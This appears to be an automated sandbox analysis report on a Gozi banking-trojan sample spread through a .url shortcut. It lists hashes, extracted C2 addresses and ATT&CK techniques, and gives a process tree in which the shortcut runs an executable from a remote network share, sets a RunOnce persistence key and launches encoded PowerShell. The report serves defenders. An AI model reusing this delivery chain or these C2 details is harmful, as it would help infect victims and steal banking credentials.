gozi | 00a11f7f6f468459711a2907e4dc74f7d574b37c7bc5f2b8e73e518848ff9d50

General

Target

Gennaio_url.url
Size

198B
MD5

c359626e0daea8955bdbb417316c38ba
SHA1

0de679c73d0d580050e252d4aa1924920ff77d3b
SHA256

00a11f7f6f468459711a2907e4dc74f7d574b37c7bc5f2b8e73e518848ff9d50
SHA512

2ead9ffcb4eb3b878c497c370071cf283e17bb006728219507b250a60e0d6dcd629b30365074d649773086245a8086091e0cd60a60effcd97d88315e3ca66174

Score

10^/10

gozi 7704 banker isfb persistence trojan

Malware Config

Extracted

Family

gozi

Extracted

Family

gozi

Botnet

7704

C2

checklist.skype.com

62.173.149.202

31.41.44.158

193.0.178.157

Attributes

base_path
/drew/
build
250249
exe_type
loader
extension
.jlk
server_id
50

rsa_pubkey.plain

aes.plain

Signatures

Gozi
Gozi is a well-known and widely distributed banking trojan.
banker trojan gozi

Executes dropped EXE 2 IoCs

pid	Process
452	maintainabovl.exe
2700	maintainabovl.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Control Panel\International\Geo\Nation	rundll32.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Control Panel\International\Geo\Nation	maintainabovl.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce	Informazion.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	Informazion.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 452 set thread context of 2700	452	maintainabovl.exe	99

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2896	powershell.exe
2896	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	452	maintainabovl.exe
Token: SeDebugPrivilege	2896	powershell.exe

Suspicious use of WriteProcessMemory 19 IoCs

description	pid	Process	procid_target
PID 2276 wrote to memory of 3964	2276	rundll32.exe	83
PID 2276 wrote to memory of 3964	2276	rundll32.exe	83
PID 3964 wrote to memory of 452	3964	Informazion.exe	87
PID 3964 wrote to memory of 452	3964	Informazion.exe	87
PID 3964 wrote to memory of 452	3964	Informazion.exe	87
PID 452 wrote to memory of 2896	452	maintainabovl.exe	93
PID 452 wrote to memory of 2896	452	maintainabovl.exe	93
PID 452 wrote to memory of 2896	452	maintainabovl.exe	93
PID 452 wrote to memory of 2700	452	maintainabovl.exe	99
PID 452 wrote to memory of 2700	452	maintainabovl.exe	99
PID 452 wrote to memory of 2700	452	maintainabovl.exe	99
PID 452 wrote to memory of 2700	452	maintainabovl.exe	99
PID 452 wrote to memory of 2700	452	maintainabovl.exe	99
PID 452 wrote to memory of 2700	452	maintainabovl.exe	99
PID 452 wrote to memory of 2700	452	maintainabovl.exe	99
PID 452 wrote to memory of 2700	452	maintainabovl.exe	99
PID 452 wrote to memory of 2700	452	maintainabovl.exe	99
PID 452 wrote to memory of 2700	452	maintainabovl.exe	99
PID 452 wrote to memory of 2700	452	maintainabovl.exe	99

C:\Windows\System32\rundll32.exe
"C:\Windows\System32\rundll32.exe" "C:\Windows\System32\ieframe.dll",OpenURL C:\Users\Admin\AppData\Local\Temp\Gennaio_url.url
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2276
- \??\UNC\62.173.147.16\Agenzia\Informazion.exe
  "\\62.173.147.16\Agenzia\Informazion.exe"
  2⤵
  - Adds Run key to start application
  - Suspicious use of WriteProcessMemory
  PID:3964
- - C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe
    C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe
    3⤵
    - Executes dropped EXE
    - Checks computer location settings
    - Suspicious use of SetThreadContext
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:452
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMwA4AA==
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2896
  - - C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe
      C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe
      4⤵
      Executes dropped EXE
      PID:2700

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

1

T1060

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe

Filesize
362.4MB

MD5
b405b1565194722f9457002c4edacbae

SHA1
3a3b6f5a05d8d2e95432abea5241f9fc5178a6fa

SHA256
c37fc8e08a4dedac07c4a058b243a6bbab08239fd52b36dbe5de9fb114decc59

SHA512
bf7963ab33052ef586b9f3d0b201f34d7ddce4b3d06f697f505b55a6cd2661e92edc76a34113d83c3c61db7ef12856bf5859353d6dd2f6864d8826934e0a1720

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe

Filesize
362.4MB

MD5
b405b1565194722f9457002c4edacbae

SHA1
3a3b6f5a05d8d2e95432abea5241f9fc5178a6fa

SHA256
c37fc8e08a4dedac07c4a058b243a6bbab08239fd52b36dbe5de9fb114decc59

SHA512
bf7963ab33052ef586b9f3d0b201f34d7ddce4b3d06f697f505b55a6cd2661e92edc76a34113d83c3c61db7ef12856bf5859353d6dd2f6864d8826934e0a1720

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe

Filesize
362.4MB

MD5
b405b1565194722f9457002c4edacbae

SHA1
3a3b6f5a05d8d2e95432abea5241f9fc5178a6fa

SHA256
c37fc8e08a4dedac07c4a058b243a6bbab08239fd52b36dbe5de9fb114decc59

SHA512
bf7963ab33052ef586b9f3d0b201f34d7ddce4b3d06f697f505b55a6cd2661e92edc76a34113d83c3c61db7ef12856bf5859353d6dd2f6864d8826934e0a1720

Download Submit
memory/452-136-0x0000000000AD0000-0x0000000000AD8000-memory.dmp

Filesize
32KB

Download
memory/452-137-0x0000000005A10000-0x0000000005FB4000-memory.dmp

Filesize
5.6MB

Download
memory/452-138-0x0000000005500000-0x0000000005592000-memory.dmp

Filesize
584KB

Download
memory/452-139-0x0000000005490000-0x000000000549A000-memory.dmp

Filesize
40KB

Download
memory/452-140-0x000000000CE00000-0x000000000CE22000-memory.dmp

Filesize
136KB

Download
memory/2700-150-0x0000000000400000-0x000000000040D000-memory.dmp

Filesize
52KB

Download
memory/2700-158-0x0000000000400000-0x000000000040D000-memory.dmp

Filesize
52KB

Download
memory/2700-155-0x0000000000DE0000-0x0000000000DED000-memory.dmp

Filesize
52KB

Download
memory/2700-154-0x0000000000400000-0x000000000040D000-memory.dmp

Filesize
52KB

Download
memory/2700-153-0x0000000000400000-0x000000000040D000-memory.dmp

Filesize
52KB

Download
memory/2896-148-0x00000000069D0000-0x00000000069EA000-memory.dmp

Filesize
104KB

Download
memory/2896-142-0x00000000013F0000-0x0000000001426000-memory.dmp

Filesize
216KB

Download
memory/2896-147-0x0000000007B70000-0x00000000081EA000-memory.dmp

Filesize
6.5MB

Download
memory/2896-146-0x00000000064F0000-0x000000000650E000-memory.dmp

Filesize
120KB

Download
memory/2896-145-0x0000000005E70000-0x0000000005ED6000-memory.dmp

Filesize
408KB

Download
memory/2896-144-0x0000000005640000-0x00000000056A6000-memory.dmp

Filesize
408KB

Download
memory/2896-143-0x00000000056D0000-0x0000000005CF8000-memory.dmp

Filesize
6.2MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads